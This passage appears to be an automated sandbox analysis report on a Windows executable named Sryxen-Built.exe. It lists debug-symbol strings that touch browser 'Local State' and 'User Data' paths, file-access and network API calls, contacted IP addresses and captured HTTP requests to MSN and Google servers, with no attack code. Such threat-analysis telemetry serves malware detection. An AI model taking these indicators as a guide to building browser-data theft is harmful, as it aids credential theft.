Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbs.dat source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateon source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbte source: Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300106421.00000273000F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ate source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2State source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State*te source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2s\*te source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2e\*eW6 source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\eState source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ngState\* source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb2658 source: Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statete\* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\enses\Local Stateatee6 source: Sryxen-Built.exe, 00000000.00000003.1297909339.0000027300107000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1297889178.0000027300101000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Sryxen-Built.exe, 00000000.00000003.1376501041.00000273002EA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002EB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376398317.00000273002E1000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376811787.00000273002F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local Statetate4 source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbs\tate&)` source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\***p source: Sryxen-Built.exe, 00000000.00000003.1303947102.0000027300108000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304159912.0000027300108000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*ew source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Uninstall-PerUser_2025-03-07_103157_8ac-16f4.log.pdbjon source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*a source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\*n* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325746295.00000273000DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Datatatee source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*. source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbte source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831tetete source: Sryxen-Built.exe, 00000000.00000003.1325269713.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325153577.0000027300110000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e7b466d5-50e5-406a-8ec7-bccc33cd9768.up_meta_body.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1308726433.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309593143.0000027300111000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\User Data\Local Stateeay source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F65789AC FindClose,FindFirstFileExW,GetLastError,0_2_00007FF6F65789AC
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F6578A8C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,0_2_00007FF6F6578A8C
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\SystemAppData\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\AppData\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\Microsoft.WindowsAlarms\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\RoamingState\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Publishers\8wekyb3d8bbwe\SettingsContainer\Jump to behavior
Source: C:\Users\user\Desktop\Sryxen-Built.exeFile opened: C:\Users\user\AppData\Local\Packages\Microsoft.WebpImageExtension_8wekyb3d8bbwe\LocalCache\Jump to behavior
Source: Joe Sandbox ViewIP Address: 2.22.242.105 2.22.242.105
Source: Joe Sandbox ViewIP Address: 52.182.143.214 52.182.143.214
Source: Joe Sandbox ViewIP Address: 162.159.61.3 162.159.61.3
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.37
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.6
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.6
Source: unknownTCP traffic detected without corresponding DNS query: 23.44.201.6
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.124.28
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.124.28
Source: unknownTCP traffic detected without corresponding DNS query: 18.164.124.28
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: unknownTCP traffic detected without corresponding DNS query: 23.209.72.40
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63892F0 Concurrency::details::WorkQueue::IsStructuredEmpty,send,recv,0_2_00007FF6F63892F0
Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /crx/blobs/Ad_brx23lef_cW590ESOTTAroOhZ9si0XFJIUC52j2ILHW1VLB5ou6c0RgLWwGr1aRJJZ0WPNyiPBYgIpWfykvhKW-6BLzMRsp9ykw5f6ReBQmPpO6WB9pcSJPfykLTHDjYAxlKa5bf72z8tHS5eXuTavTP1h4WZBjSs/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_89_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.867cdfd625d830718faf.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 550sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 3gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=7F8F53D427D648059CF06719C9A45F3F.RefC=2025-03-08T23:52:34Z; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; MUIDB=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.4fa8815283fe3d88a934.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.a1e626d952b002612af0.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.c64f021441815c638c7a.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1
Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1741477966956&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=7f8f53d427d648059cf06719c9a45f3f&activityId=7f8f53d427d648059cf06719c9a45f3f&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=30F2568B099669BF2FA4432208F968D1; _EDGE_S=F=1&SID=06C0C3FA3AA5651C227ED6533B9964DD; _EDGE_V=1
